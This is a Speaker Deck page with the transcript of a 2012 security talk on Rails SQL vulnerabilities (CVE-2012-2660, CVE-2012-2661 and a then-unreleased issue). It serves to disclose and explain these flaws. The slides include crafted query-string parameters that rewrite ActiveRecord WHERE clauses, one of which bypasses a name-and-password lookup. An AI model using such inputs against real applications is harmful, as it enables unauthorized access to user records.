Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
"Recent Rails SQL Issues" - 2012
Search
Justin Collins
April 23, 2015
Programming
0
69
"Recent Rails SQL Issues" - 2012
Justin Collins
April 23, 2015
Tweet
Share
More Decks by Justin Collins
See All by Justin Collins
Continuous (Application) Security at DevOps Velocity
presidentbeef
0
150
The Evolution of Rails Security
presidentbeef
1
820
Brakeman RailsConf 2017 Lightning Talk
presidentbeef
0
140
Practical Static Analysis for Continuous Application Security
presidentbeef
0
200
"...But Doesn't Rails Take Care of Security for Me?"
presidentbeef
1
450
Continuous Security with Practical Static Analysis
presidentbeef
1
320
Security Automation at Twitter - Rise of the Machines
presidentbeef
0
240
The World of Rails Security - RailsConf 2015
presidentbeef
8
1.2k
Tales from the Crypt
presidentbeef
1
240
Other Decks in Programming
See All in Programming
フロントエンド開発のためのブラウザ組み込みAI入門
masashi
7
3.4k
One Enishi After Another
snoozer05
PRO
0
150
CSC509 Lecture 06
javiergs
PRO
0
270
テーブル定義書の構造化抽出して、生成AIでDWH分析を試してみた / devio2025tokyo
kasacchiful
0
280
Ktorで簡単AIアプリケーション
tsukakei
0
100
マンガアプリViewerの大画面対応を考える
kk__777
0
150
Leading Effective Engineering Teams in the AI Era
addyosmani
7
580
Cursorハンズオン実践!
eltociear
2
1.2k
monorepo の Go テストをはやくした〜い!~最小の依存解決への道のり~ / faster-testing-of-monorepos
convto
2
530
Developer Joy - The New Paradigm
hollycummins
1
360
理論と実務のギャップを超える
eycjur
0
180
スマホから Youtube Shortsを見られないようにする
lemolatoon
27
34k
Featured
See All Featured
Making the Leap to Tech Lead
cromwellryan
135
9.6k
Fashionably flexible responsive web design (full day workshop)
malarkey
407
66k
YesSQL, Process and Tooling at Scale
rocio
173
15k
A Tale of Four Properties
chriscoyier
161
23k
Sharpening the Axe: The Primacy of Toolmaking
bcantrill
46
2.5k
What's in a price? How to price your products and services
michaelherold
246
12k
How to train your dragon (web standard)
notwaldorf
97
6.3k
Git: the NoSQL Database
bkeepers
PRO
431
66k
Fight the Zombie Pattern Library - RWD Summit 2016
marcelosomers
234
17k
個人開発の失敗を避けるイケてる考え方 / tips for indie hackers
panda_program
116
20k
Producing Creativity
orderedlist
PRO
347
40k
The Straight Up "How To Draw Better" Workshop
denniskardys
238
140k
Transcript
Rails Vulnerabilities Last Week CVE-2012-2660 CVE-2012-2661
CVE-2012-2660 Allows unexpected “IS NULL” in queries Affects Rails 2.x
and 3.x
ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end
Query Parameters ?name[] {"name"=>[nil]}
ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end
Resulting SQL SELECT "users".* FROM "users" WHERE "users"."name" IS NULL
CVE-2012-2661 Allows some manipulation of WHERE clause via “dotted” query
keys Affects Rails 3.x
ActiveRecord Query User.where(:name => params[:name])
ActiveRecord Query User.where("users.name" => params[:name])
Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}
ActiveRecord Query User.where(:name => {"users.id" => "1"})
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1
Unreleased Vulnerability Allows some manipulation of WHERE clause via nested
hashes in query values Affects 2.3.x and 3.x
ActiveRecord Query User.where(:name => params[:name], :password => params[:password])
Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}
ActiveRecord Query User.where( :name => {"users"=>{"id"=>"1"}, :password => {"users"=>{"id"=>"1"} )
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1 AND "users"."id" = 1